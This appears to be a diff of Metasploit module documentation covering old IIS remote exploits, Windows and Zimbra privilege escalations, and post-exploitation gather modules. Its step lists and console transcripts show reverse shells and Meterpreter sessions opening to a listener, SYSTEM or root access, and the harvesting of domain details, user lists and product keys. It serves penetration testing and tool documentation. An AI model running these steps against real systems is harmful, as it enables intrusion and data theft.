+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.200.195
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.195:1168) at 2022-07-08 11:07:42 -0400
+
+
+Shell Banner:
+Microsoft Windows 2000 [Version 5.00.2195]
+-----
+
+
+C:\WINNT\system32>ver
+ver
+
+Microsoft Windows 2000 [Version 5.00.2195]
+```
@@ -0,0 +1,71 @@
+## Vulnerable Application
+
+This module will execute an arbitrary payload on a Microsoft IIS installation
+that is vulnerable to the CGI double-decode vulnerability of 2001.
+
+This module has been tested successfully on:
+
+* Windows 2000 Professional (SP0) (EN)
+* Windows 2000 Professional (SP1) (AR)
+* Windows 2000 Professional (SP1) (CZ)
+* Windows 2000 Server (SP0) (FR)
+* Windows 2000 Server (SP1) (EN)
+* Windows 2000 Server (SP1) (SE)
+
+Note: This module will leave a Metasploit payload in the IIS scripts directory.
+
+## Verification Steps
+
+1. `use exploit/windows/iis/ms01_026_dbldecode`
+1. `set RHOSTS [IP]`
+1. `set PAYLOAD windows/shell/reverse_tcp`
+1. `set LHOST [IP]`
+1. `run`
+
+## Options
+
+### WINDIR
+
+The Windows directory name of the target host.
+The directory name will be detected automatically if not set.
+
+### DEPTH
+
+Traversal depth to reach the drive root (default: `2`)
+
+## Scenarios
+
+### Windows 2000 Server (SP0) (FR)
+
+```
+msf6 > use exploit/windows/iis/ms01_026_dbldecode
+[*] Using configured payload windows/shell/reverse_tcp
+msf6 exploit(windows/iis/ms01_026_dbldecode) > set rhosts 192.168.200.175
+rhosts => 192.168.200.175
+msf6 exploit(windows/iis/ms01_026_dbldecode) > check
+[+] 192.168.200.175:80 - The target is vulnerable. Found Windows directory name: winnt
+msf6 exploit(windows/iis/ms01_026_dbldecode) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf6 exploit(windows/iis/ms01_026_dbldecode) > run
+
+[*] Started reverse TCP handler on 192.168.200.130:4444
+[*] Using Windows directory "winnt"
+[*] Copying "\winnt\system32\cmd.exe" to the IIS scripts directory as "EcFJ.exe"...
+[*] Command Stager progress -  66.67% done (40/60 bytes)
+[*] Command Stager progress - 100.00% done (60/60 bytes)
+[*] Triggering payload "qQErEZeB.exe" via a direct request...
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.200.175
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.175:1090) at 2022-06-28 08:34:32 -0400
+[!] This exploit may require manual cleanup of 'qQErEZeB.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows 2000 [Version 5.00.2195]
+-----
+          
+
+c:\inetpub\scripts>hostname
+hostname
+win2k-srv-fr
+```
@@ -0,0 +1,90 @@
+## Vulnerable Application
+
+This module can be used to execute arbitrary code on IIS servers
+that expose the /msadc/msadcs.dll Microsoft Data Access Components
+(MDAC) Remote Data Service (RDS) DataFactory service. The service is
+exploitable even when RDS is configured to deny remote connections
+(handsafe.reg). The service is vulnerable to a heap overflow where
+the RDS DataStub 'Content-Type' string is overly long. Microsoft Data
+Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable.
+
+This module has been tested successfully on:
+
+* Windows 2000 Pro SP0-SP3 (English)
+* Windows 2000 Pro SP0 (Korean)
+* Windows 2000 Pro SP0 (Dutch)
+* Windows 2000 Pro SP0 (Finnish)
+* Windows 2000 Pro SP0 (Turkish)
+* Windows 2000 Pro SP0-SP1 (Greek)
+* Windows 2000 Pro SP1 (Arabic)
+* Windows 2000 Pro SP1 (Czech)
+* Windows 2000 Pro SP2 (French)
+* Windows 2000 Pro SP2 (Portuguese)
+
+## Verification Steps
+
+1. `use exploit/windows/iis/ms02_065_msadc`
+1. `set RHOSTS [IP]`
+1. `show targets` to see the possible targets
+1. `set TARGET [TARGET]`
+1. `set PAYLOAD windows/shell/reverse_tcp`
+1. `set LHOST [IP]`
+1. `run`
+
+## Options
+
+### TARGETURI
+
+The path to `msadcs.dll` (Default: `/msadc/msadcs.dll`)
+
+## Scenarios
+
+### Windows 2000 Professional SP3 (EN)
+
+```
+msf6 > use exploit/windows/iis/ms02_065_msadc
+[*] Using configured payload windows/shell/reverse_tcp
+msf6 exploit(windows/iis/ms02_065_msadc) > set rhosts 192.168.200.186
+rhosts => 192.168.200.186
+msf6 exploit(windows/iis/ms02_065_msadc) > show targets
+
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Windows 2000 Pro SP0-SP3 (English)
+   1   Windows 2000 Pro SP0 (Korean)
+   2   Windows 2000 Pro SP0 (Dutch)
+   3   Windows 2000 Pro SP0 (Finnish)
+   4   Windows 2000 Pro SP0 (Turkish)
+   5   Windows 2000 Pro SP0-SP1 (Greek)
+   6   Windows 2000 Pro SP1 (Arabic)
+   7   Windows 2000 Pro SP1 (Czech)
+   8   Windows 2000 Pro SP2 (French)
+   9   Windows 2000 Pro SP2 (Portuguese)
+
+
+msf6 exploit(windows/iis/ms02_065_msadc) > set target 0
+target => 0
+msf6 exploit(windows/iis/ms02_065_msadc) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf6 exploit(windows/iis/ms02_065_msadc) > check
+[*] 192.168.200.186:80 - The service is running, but could not be validated. /msadc/msadcs.dll content type matches fingerprint application/x-varg
+msf6 exploit(windows/iis/ms02_065_msadc) > run
+
+[*] Started reverse TCP handler on 192.168.200.130:4444
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.200.186
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.186:1028) at 2022-07-07 10:13:35 -0400
+
+
+Shell Banner:
+Microsoft Windows 2000 [Version 5.00.2195]
+-----
+
+
+C:\WINNT\system32>ver
+ver
+
+Microsoft Windows 2000 [Version 5.00.2195]
+```
@@ -0,0 +1,105 @@
+## Vulnerable Application
+
+This exploits a buffer overflow in NTDLL.dll on Windows 2000
+through the SEARCH WebDAV method in IIS. This particular
+module only works against Windows 2000. It should have a
+reasonable chance of success against SP0 to SP3.
+
+This module has been tested successfully on:
+
+* Windows 2000 Professional SP0 (EN)
+* Windows 2000 Professional SP0 (FI)
+* Windows 2000 Professional SP0 (NL)
+* Windows 2000 Professional SP0 (TR)
+* Windows 2000 Professional SP1 (AR)
+* Windows 2000 Professional SP1 (CZ)
+* Windows 2000 Professional SP1 (EN)
+* Windows 2000 Professional SP2 (EN)
+* Windows 2000 Professional SP2 (FR)
+* Windows 2000 Professional SP2 (PT)
+* Windows 2000 Professional SP3 (EN)
+* Windows 2000 Server SP0 (DE)
+* Windows 2000 Server SP0 (EN)
+* Windows 2000 Server SP0 (ES)
+* Windows 2000 Server SP0 (FR)
+* Windows 2000 Server SP0 (HU)
+* Windows 2000 Server SP0 (NL)
+* Windows 2000 Server SP0 (PT)
+* Windows 2000 Server SP0 (TR)
+* Windows 2000 Server SP1 (EN)
+* Windows 2000 Server SP1 (SE)
+* Windows 2000 Server SP2 (EN)
+* Windows 2000 Server SP2 (RU)
+* Windows 2000 Server SP3 (DE)
+* Windows 2000 Server SP3 (IT)
+
+## Verification Steps
+
+1. `use exploit/windows/iis/ms03_007_ntdll_webdav`
+1. `set RHOSTS [IP]`
+1. `set PAYLOAD windows/shell/reverse_tcp`
+1. `set LHOST [IP]`
+1. `run`
+
+## Options
+
+
+## Scenarios
+
+### Windows 2000 Professional SP1 (EN)
+
+
+```
+msf6 > use exploit/windows/iis/ms03_007_ntdll_webdav 
+[*] Using configured payload windows/shell/reverse_tcp
+msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > set rhosts 192.168.200.195
+rhosts => 192.168.200.195
+msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > set lhost 192.168.200.130 
+lhost => 192.168.200.130
+msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > check
+[+] 192.168.200.195:80 - The target is vulnerable. We've hit a server error (exception)
+msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > run
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+[*] Trying return address 0x004e004f (1 / 88)...
+[-] Attempt failed: Connection reset by peer
+[*] Checking if IIS is back up after a failed attempt...
+[-] Connection failed (1 of 20)...
+[-] Connection failed (2 of 20)...
+[-] Connection failed (3 of 20)...
+[-] Connection failed (4 of 20)...
+[*] Trying return address 0x00ce004f (2 / 88)...
+[-] Attempt failed: Connection reset by peer
+[*] Checking if IIS is back up after a failed attempt...
+[-] Connection failed (1 of 20)...
+[-] Connection failed (2 of 20)...
+[*] Trying return address 0x00ce0041 (3 / 88)...
+[-] Attempt failed: Connection reset by peer
+[*] Checking if IIS is back up after a failed attempt...
+[-] Connection failed (1 of 20)...
+[-] Connection failed (2 of 20)...
+[-] Connection failed (3 of 20)...
+[-] Connection failed (4 of 20)...
+[*] Trying return address 0x00430041 (4 / 88)...
+[-] Attempt failed: Connection reset by peer
+[*] Checking if IIS is back up after a failed attempt...
+[-] Connection failed (1 of 20)...
+[-] Connection failed (2 of 20)...
+[*] Trying return address 0x00b40041 (5 / 88)...
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.200.195
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.195:1066) at 2022-07-07 06:13:21 -0400
+
+
+Shell Banner:
+Microsoft Windows 2000 [Version 5.00.2195]
+-----
+
+
+C:\WINNT\system32>ver
+ver
+
+Microsoft Windows 2000 [Version 5.00.2195]
+
+C:\WINNT\system32>
+```
@@ -1,51 +1,65 @@
 ## Vulnerable Application

-This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.
-
-## Scenarios
+This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
+When processing task files, the Windows Task Scheduler only uses a CRC32
+checksum to validate that the file has not been tampered with. Also, In a default
+configuration, normal users can read and write the task files that they have
+created. By modifying the task file and creating a CRC32 collision, an attacker
+can execute arbitrary commands with SYSTEM privileges.

 ## Verification Steps

 1. Start msfconsole
-2. Do: `use modules/exploits/windows/local/ms10_092_schelevator`
-3. Do: `set SESSION [#]`
-4. Do: `run`
+2. Get a Meterpreter session
+3. Do: `use modules/exploits/windows/local/ms10_092_schelevator`
+4. Do: `set SESSION <session id>`
+5. Do: `run`

-### A run on Windows Vista (Build 6000) and Kali Linux 2019.3
+## Options

-  ```
-  msf > use modules/exploits/windows/local/ms10_092_schelevator
-  msf exploit(windows/local/ms10_092_schelevator) > set SESSION 1
-    SESSION => 1
-  msf5 exploit(windows/local/ms10_092_schelevator) > run  
-    [*] Started reverse TCP handler on 192.168.1.3:4444
-    [*] Preparing payload at C:\Users\test\AppData\Local\Temp\CItOOtB.exe
-    [*] Creating task: TzAZ6H4K
-    [*] SUCCESS: The scheduled task "TzAZ6H4K" has successfully been created.
-    [*] SCHELEVATOR
-    [*] Reading the task file contents from C:\Windows\system32\tasks\TzAZ6H4K...
-    [*] Original CRC32: 0x69b1db25
-    [*] Final CRC32: 0x69b1db25
-    [*] Writing our modified content back...
-    [*] Validating task: TzAZ6H4K
-    [*]
-    [*] Folder: \
-    [*] TaskName                                   Next Run Time        Status
-    [*] ========================================== ==================== ===============
-    [*] TzAZ6H4K                                   12/1/2019 10:41:00 A Ready
-    [*] SCHELEVATOR
-    [*] Disabling the task...
-    [*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.
-    [*] SCHELEVATOR
-    [*] Enabling the task...
-    [*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.
-    [*] SCHELEVATOR
-    [*] Executing the task...
-    [*] Sending stage (180291 bytes) to 192.168.1.2
-    [*] SUCCESS: Attempted to run the scheduled task "TzAZ6H4K".
-    [*] SCHELEVATOR
-    [*] Deleting the task...
-    [*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.2:49249) at 2019-11-27 10:42:02 -0700
-    [*] SUCCESS: The scheduled task "TzAZ6H4K" was successfully deleted.
-    [*] SCHELEVATOR
-  ```
+### TASKNAME
+
+A name for the created task (default is random)
+
+## Scenarios
+
+### Windows Server 2008 SP1 (x64)
+
+```
+msf6 > use exploit/windows/local/ms10_092_schelevator
+[*] Using configured payload windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/local/ms10_092_schelevator) > set session 1
+session => 1
+msf6 exploit(windows/local/ms10_092_schelevator) > run
+
+[*] Started reverse TCP handler on 192.168.200.130:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[*] Preparing payload at C:\Users\user\AppData\Local\Temp\QMGmEeEmFFq.exe
+[*] Creating task: qThxbR37
+[*] Reading the task file contents from C:\Windows\system32\tasks\qThxbR37...
+[*] Original CRC32: 0xec6cfb1d
+[*] Final CRC32: 0xec6cfb1d
+[*] Writing our modified content back...
+[*] Validating task: qThxbR37
+[*] Disabling the task...
+[*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed.
+[*] Enabling the task...
+[*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed.
+[*] Executing the task...
+[*] Sending stage (200774 bytes) to 192.168.200.218
+[*] Meterpreter session 2 opened (192.168.200.130:4444 -> 192.168.200.218:52347) at 2022-08-19 00:53:17 -0400
+[*] Deleting task pcT2p46d0...
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-17B09RRRJTG
+OS              : Windows 2008 (6.0 Build 6001, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : CORP
+Logged On Users : 3
+Meterpreter     : x64/windows
+meterpreter >
+```
@@ -0,0 +1,47 @@
+## Vulnerable Application
+
+Currently, as of 2022-07-26, all versions of Zimbra are vulnerable. Presumably they'll patch it eventually - I have an open security ticket with Zimbra.
+
+## Verification Steps
+
+Install Zimbra on any supported Linux version and get a session as the `zimbra` user. I used Ubuntu 18.04 for testing, and then CVE-2022-30333 to exploit, but this will work on a fully patched system as well. Then...
+
+```
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information                  Connection
+  --  ----  ----                   -----------                  ----------
+  10        meterpreter x86/linux  zimbra @ zimbra.example.org  10.0.0.146:4444 -> 10.0.0.154:39800 (10.0.0.154)
+
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > use exploit/linux/local/zimbra_slapper_priv_esc
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 10
+SESSION => 10
+msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Executing: sudo -n -l
+[+] The target is vulnerable.
+[*] Creating exploit directory: /tmp/.5kq9XO
+[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.5kq9XO/.1wNk1h3
+[*] Sending stage (3020772 bytes) to 10.0.0.154
+[+] Deleted /tmp/.5kq9XO
+[*] Meterpreter session 13 opened (10.0.0.146:4444 -> 10.0.0.154:40044) at 2022-07-21 14:04:12 -0700
+
+meterpreter > getuid
+Server username: root
+```
+
+## Options
+
+### SUDO_PATH
+
+The path to `sudo` on the host. If we have a proper environment with `$PATH` set, which we generally do, simply `sudo` is fine.
+
+### ZIMBRA_BASE
+
+The base where Zimbra is installed. Zimbra typically installs to `/opt/zimbra`, and I'm not even sure if it _can_ install elsewhere, so this default should be fine.
@@ -0,0 +1,67 @@
+## Vulnerable Application
+
+This module prints out the operating system environment variables.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a session
+1. Do: `use post/multi/gather/env`
+1. Do: `set SESSION <session id>`
+1. Do: `run`
+
+## Options
+
+## Scenarios
+
+### Windows 11 Pro (10.0.22000 N/A Build 22000)
+
+```
+msf6 > use post/multi/gather/env
+msf6 post(multi/gather/env) > set session 1 
+session => 1
+msf6 post(multi/gather/env) > run
+
+[*] Running module against WinDev2110Eval (192.168.200.140)
+ALLUSERSPROFILE=C:\ProgramData
+APPDATA=C:\Users\User\AppData\Roaming
+CommonProgramFiles=C:\Program Files\Common Files
+CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
+CommonProgramW6432=C:\Program Files\Common Files
+COMPUTERNAME=WINDEV2110EVAL
+ComSpec=C:\Windows\system32\cmd.exe
+DriverData=C:\Windows\System32\Drivers\DriverData
+HOMEDRIVE=C:
+HOMEPATH=\Users\User
+LOCALAPPDATA=C:\Users\User\AppData\Local
+LOGONSERVER=\\WINDEV2110EVAL
+NUMBER_OF_PROCESSORS=2
+OneDrive=C:\Users\User\OneDrive
+OS=Windows_NT
+Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\dotnet\;C:\Program Files\Microsoft SQL Server\130\Tools\Binn\;C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\;C:\Users\User\AppData\Local\Microsoft\WindowsApps;;C:\Users\User\AppData\Local\Programs\Microsoft VS Code\bin;C:\Users\User\.dotnet\tools
+PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
+PROCESSOR_ARCHITECTURE=AMD64
+PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 26 Stepping 5, GenuineIntel
+PROCESSOR_LEVEL=6
+PROCESSOR_REVISION=1a05
+ProgramData=C:\ProgramData
+ProgramFiles=C:\Program Files
+ProgramFiles(x86)=C:\Program Files (x86)
+ProgramW6432=C:\Program Files
+PROMPT=$P$G
+PSExecutionPolicyPreference=Bypass
+PSModulePath=C:\Users\User\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
+PUBLIC=C:\Users\Public
+SESSIONNAME=Console
+SystemDrive=C:
+SystemRoot=C:\Windows
+TEMP=C:\Users\User\AppData\Local\Temp
+TMP=C:\Users\User\AppData\Local\Temp
+USERDOMAIN=WINDEV2110EVAL
+USERDOMAIN_ROAMINGPROFILE=WINDEV2110EVAL
+USERNAME=User
+USERPROFILE=C:\Users\User
+windir=C:\Windows
+[+] Results saved to /root/.msf4/loot/20220731233101_default_192.168.200.140_windows.environm_058721.txt
+[*] Post module execution completed
+```
@@ -0,0 +1,44 @@
+## Vulnerable Application
+
+This module will check the file system and registry for particular artifacts.
+
+The list of artifacts is read in YAML format from `data/post/enum_artifacts_list.txt`
+or a user specified file. Any matches are written to the loot.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a session
+1. Do: `use post/windows/gather/enum_artifcats`
+1. Do: `set SESSION <session id>`
+1. Do: `run`
+
+## Options
+
+### ARTIFACTS
+
+Full path to artifacts file.
+
+## Scenarios
+
+### Windows 7 (6.1 Build 7601, Service Pack 1)
+
+```
+msf6 > use post/windows/gather/enum_artifacts 
+msf6 post(windows/gather/enum_artifacts) > set session 1
+session => 1
+msf6 post(windows/gather/enum_artifacts) > set verbose true
+verbose => true
+msf6 post(windows/gather/enum_artifacts) > run
+
+[*] Searching for artifacts of test_evidence
+[*] Processing 2 file entries for test_evidence ...
+[*] Processing 2 registry entries for test_evidence ...
+[*] Artifacts of test_evidence found.
+Evidence of test_evidence found.
+	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ACPI\DisplayName
+
+[+] Enumerated Artifacts stored in: /root/.msf4/loot/20220807015628_default_192.168.200.190_enumerated.artif_933981.txt
+[*] Post module execution completed
+```
@@ -1,7 +1,7 @@
 ## Vulnerable Application

-This module identifies the primary domain via the registry. The registry value used is: 
-`HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\DCName`.
+This module identifies the primary Active Directory domain name
+and domain controller.

 ## Verification Steps

@@ -10,34 +10,36 @@ This module identifies the primary domain via the registry. The registry value u
 1. Do: `use post/windows/gather/enum_domain`
 1. Do: `set session [#]`
 1. Do: `run`
-1. You should information on the computer's domain
+1. You should receive Active Directory domain information

 ## Options

 ## Scenarios

-### Windows 2012 DC
+### Windows 2016 with Windows 2008 SP1 DC

 ```
-msf6 post(windows/gather/enum_domain) > sessions -i 6
-[*] Starting interaction with 6...
+msf6 post(windows/gather/enum_domain) > sessions -i 1
+[*] Starting interaction with 1...

 meterpreter > sysinfo
-Computer        : DC1
-OS              : Windows 2012 (6.2 Build 9200).
+Computer        : WIN-7V3NGVNQTJ1
+OS              : Windows 2016+ (10.0 Build 14393).
 Architecture    : x64
 System Language : en_US
-Domain          : hoodiecola
+Domain          : CORP
 Logged On Users : 4
-Meterpreter     : x86/windows
+Meterpreter     : x64/windows
 meterpreter > background
-[*] Backgrounding session 6...
+[*] Backgrounding session 1...
+
 msf6 post(windows/gather/enum_domain) > use post/windows/gather/enum_domain
-msf6 post(windows/gather/enum_domain) > set session 6
-session => 6
+msf6 post(windows/gather/enum_domain) > set session 1
+session => 1
 msf6 post(windows/gather/enum_domain) > run

-[+] FOUND Domain: hoodiecola
-[+] FOUND Domain Controller: dc1 (IP: 1.1.1.1)
+[+] Domain FQDN: corp.local
+[+] Domain NetBIOS Name: CORP
+[+] Domain Controller: WIN-17B09RRRJTG.corp.local (IP: 192.168.200.218)
 [*] Post module execution completed
 ```
@@ -1,64 +1,61 @@
-
 ## Vulnerable Application

 This module will enumerate current and recently logged on Windows users.

 ## Verification Steps

-  1. Start msfconsole
-  2. Get meterpreter session
-  3. Do: ```use post/windows/gather/enum_logged_on_users```
-  4. Do: ```set SESSION <session id>```
-  5. Do: ```run```
+1. Start msfconsole
+2. Get a session
+3. Do: `use post/windows/gather/enum_logged_on_users`
+4. Do: `set SESSION <session id>`
+5. Do: `run`

 ## Options

-  **CURRENT**
+### CURRENT

-  Enumerate currently logged on users. Default: ```true```
+Enumerate currently logged on users. (default: `true`)

-  **RECENT**
+### RECENT

-  Enumerate Recently logged on users. Default: ```true```
+Enumerate recently logged on users. (default: `true`)

-  **SESSION**
-
-  The session to run this module on.

 ## Scenarios

 ### Windows 7 (6.1 Build 7601, Service Pack 1).

-  ```
-  [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49196) at 2019-12-13 04:36:54 -0700
+```
+[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49196) at 2019-12-13 04:36:54 -0700

-  msf exploit(multi/handler) > use post/windows/gather/enum_logged_on_users
-  msf post(windows/gather/enum_logged_on_users) > set SESSION 1
-    SESSION => 1
-  msf post(windows/gather/enum_logged_on_users) > run
+msf exploit(multi/handler) > use post/windows/gather/enum_logged_on_users
+msf post(windows/gather/enum_logged_on_users) > set SESSION 1
+SESSION => 1
+msf post(windows/gather/enum_logged_on_users) > run

-  [*] Running against session 1
+[*] Running module against TEST-PC (192.168.1.10)

-    Current Logged Users
-    ====================
+Current Logged Users
+====================

-    SID                                            User
-    ---                                            ----
-    S-1-5-21-3113421791-4205713440-112141152-1000  TEST-PC\TEST
+ SID                                            User
+ ---                                            ----
+ S-1-5-21-3113421791-4205713440-112141152-1000  TEST-PC\TEST


-    [+] Results saved in: /root/.msf4/loot/20191213054456_default_192.168.1.10_host.users.activ_424278.txt
+[+] Results saved in: /root/.msf4/loot/20191213054456_default_192.168.1.10_host.users.activ_424278.txt

-    Recently Logged Users
-    =====================
+Recently Logged Users
+=====================

-    SID                                            Profile Path
-    ---                                            ------------
-    S-1-5-18                                       %systemroot%\system32\config\systemprofile
-    S-1-5-19                                       C:\Windows\ServiceProfiles\LocalService
-    S-1-5-20                                       C:\Windows\ServiceProfiles\NetworkService
-    S-1-5-21-3113421791-4205713440-112141152-1000  C:\Users\TEST
+ SID                                            Profile Path
+ ---                                            ------------
+ S-1-5-18                                       %systemroot%\system32\config\systemprofile
+ S-1-5-19                                       C:\Windows\ServiceProfiles\LocalService
+ S-1-5-20                                       C:\Windows\ServiceProfiles\NetworkService
+ S-1-5-21-3113421791-4205713440-112141152-1000  C:\Users\TEST


-    [*] Post module execution completed
-  ```
+[+] Results saved in: /root/.msf4/loot/20191213054458_default_192.168.1.10_host.users.recen_365577.txt
+[*] Post module execution completed
+```
@@ -0,0 +1,38 @@
+## Vulnerable Application
+
+This module will enumerate Microsoft product license keys.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a session
+3. Do: `use post/windows/gather/enum_ms_product_keys`
+4. Do: `set SESSION <session id>`
+5. Do: `run`
+
+## Options
+
+## Scenarios
+
+### Windows 7 Professional SP1 (x64)
+
+```
+msf6 > use post/windows/gather/enum_ms_product_keys
+msf6 post(windows/gather/enum_ms_product_keys) > set session 1
+session => 1
+msf6 post(windows/gather/enum_ms_product_keys) > run
+
+[*] Finding Microsoft product keys on TEST (192.168.200.190)
+
+Keys
+====
+
+ Product                 Registered Owner  Registered Organization  License Key
+ -------                 ----------------  -----------------------  -----------
+ Windows 7 Professional  Windows User                               N0TMY-K3Y55-N0TMY-K3Y55-N0TMY
+ Windows 7 Professional  Windows User                               N0TMY-K3Y55-N0TMY-K3Y55-N0TMY
+
+
+[+] Product keys stored in: /root/.msf4/loot/20220814092725_default_192.168.200.190_host.ms_keys_579592.txt
+[*] Post module execution completed
+```
@@ -0,0 +1,241 @@
+## Vulnerable Application
+
+This module will enumerate Microsoft PowerShell settings.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a session
+1. Do: `use post/windows/gather/enum_powershell_env`
+1. Do: `set SESSION <session id>`
+1. Do: `run`
+
+## Options
+
+## Scenarios
+
+### Windows 7 (6.1 Build 7601, Service Pack 1)
+
+```
+msf6 > use post/windows/gather/enum_powershell_env
+msf6 post(windows/gather/enum_powershell_env) > set session 1
+session => 1
+msf6 post(windows/gather/enum_powershell_env) > run
+
+[*] Running module against test (192.168.200.158)
+[*] PowerShell is installed on this system.
+[*] Version: 2.0
+[*] Execution Policy: RemoteSigned
+[*] Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+[*] No PowerShell Snap-Ins are installed
+[*] PowerShell Modules paths:
+[*] 	C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
+[*] 	C:\Program Files (x86)\Microsoft SQL Server\120\Tools\PowerShell\Modules\
+[*] 	C:\Program Files (x86)\AutoIt3\AutoItX
+[*] PowerShell Modules:
+[*] 	PSDiagnostics
+[*] 	TroubleshootingPack
+[*] 	SQLASCMDLETS
+[*] 	SQLPS
+[*] 	AutoItX.chm
+[*] 	AutoItX.psd1
+[*] 	AutoItX3.Assembly.dll
+[*] 	AutoItX3.Assembly.xml
+[*] 	AutoItX3.dll
+[*] 	AutoItX3.PowerShell.dll
+[*] 	AutoItX3_DLL.h
+[*] 	AutoItX3_DLL.lib
+[*] 	AutoItX3_x64.dll
+[*] 	AutoItX3_x64_DLL.lib
+[*] 	Examples
+[*] Checking if users have PowerShell profiles
+[*] Running with elevated privileges. Extracting user list ...
+[*] Checking asdf
+[*] Checking DefaultAppPool
+[*] Checking MSSQL$SQLEXPRESS
+[*] Checking MSSQLSERVER
+[*] Checking postgres
+[*] Checking test
+[*] Checking user
+[*] Found PowerShell profile 'C:\Users\user\Documents\WindowsPowerShell\profile.ps1' for user:
+Get-Host | Select-Object Version
+
+[*] Post module execution completed
+```
+
+### Windows 11 Pro (10.0.22000 N/A Build 22000)
+
+```
+
+msf6 > use post/windows/gather/enum_powershell_env
+msf6 post(windows/gather/enum_powershell_env) > set session 1
+session => 1
+msf6 post(windows/gather/enum_powershell_env) > run
+
+[*] Running module against WinDev2110Eval (192.168.200.140)
+[*] PowerShell is installed on this system.
+[*] Version: 2.0
+[*] Execution Policy: AllSigned
+[*] Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+[*] PowerShell Snap-Ins:
+[*] 	Snap-In: WDeploySnapin3.0
+[*] 		(Default): 
+[*] 		ApplicationBase: C:\Program
+[*] 		AssemblyName: Microsoft.Web.Deployment.PowerShell,
+[*] 		Description: This
+[*] 		ModuleName: Microsoft.Web.Deployment.PowerShell.dll
+[*] 		PowerShellVersion: 2.0
+[*] 		Vendor: Microsoft
+[*] 		Version: 9.0.0.0
+[*] PowerShell Modules paths:
+[*] 	C:\Users\User\Documents\WindowsPowerShell\Modules
+[*] 	C:\Program Files\WindowsPowerShell\Modules
+[*] 	C:\Windows\system32\WindowsPowerShell\v1.0\Modules
+[*] PowerShell Modules:
+[*] 	Azure
+[*] 	Azure.AnalysisServices
+[*] 	Azure.Storage
+[*] 	AzureRM
+[*] 	AzureRM.AnalysisServices
+[*] 	AzureRM.ApiManagement
+[*] 	AzureRM.ApplicationInsights
+[*] 	AzureRM.Automation
+[*] 	AzureRM.Backup
+[*] 	AzureRM.Batch
+[*] 	AzureRM.Billing
+[*] 	AzureRM.Cdn
+[*] 	AzureRM.CognitiveServices
+[*] 	AzureRM.Compute
+[*] 	AzureRM.Consumption
+[*] 	AzureRM.ContainerInstance
+[*] 	AzureRM.ContainerRegistry
+[*] 	AzureRM.DataFactories
+[*] 	AzureRM.DataFactoryV2
+[*] 	AzureRM.DataLakeAnalytics
+[*] 	AzureRM.DataLakeStore
+[*] 	AzureRM.DevTestLabs
+[*] 	AzureRM.Dns
+[*] 	AzureRM.EventGrid
+[*] 	AzureRM.EventHub
+[*] 	AzureRM.HDInsight
+[*] 	AzureRM.Insights
+[*] 	AzureRM.IotHub
+[*] 	AzureRM.KeyVault
